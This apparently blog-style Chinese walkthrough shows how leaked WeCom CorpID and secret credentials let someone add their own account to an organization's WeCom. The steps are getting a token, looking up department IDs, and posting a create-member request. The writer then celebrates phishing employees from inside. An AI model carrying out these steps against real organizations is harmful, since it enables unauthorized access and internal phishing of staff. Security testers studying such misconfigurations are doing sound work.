构造请求进入企业微信

1.1 通过CorpID与secret获取access_token

1
https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=id&corpsecret=secrect

调用该接口,获取access_token

image-20221021151436587

1.2 通过acess_token获取部门ID

1
https://open.work.weixin.qq.com/devtool/query?e=301002

将access_token进行输入,获取部门信息

image-20221021151528412

1.3 构造请求,将自己的微信号加入企业微信

将自己的微信信息POST进创建成员的URL

1
https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
1
2
3
4
5
6
{
   "userid": "masterperng",
   "name": "perng",
   "department": [partyid],
   "mobile":"1388888888"
}

image-20230913155954481

创建成功,成功渗透进入企业微信

image-20221021151643413

钓鱼咯

image-20221021151716763

由于是在企业微信内部开展的钓鱼,成功率很高

image-20230913155911550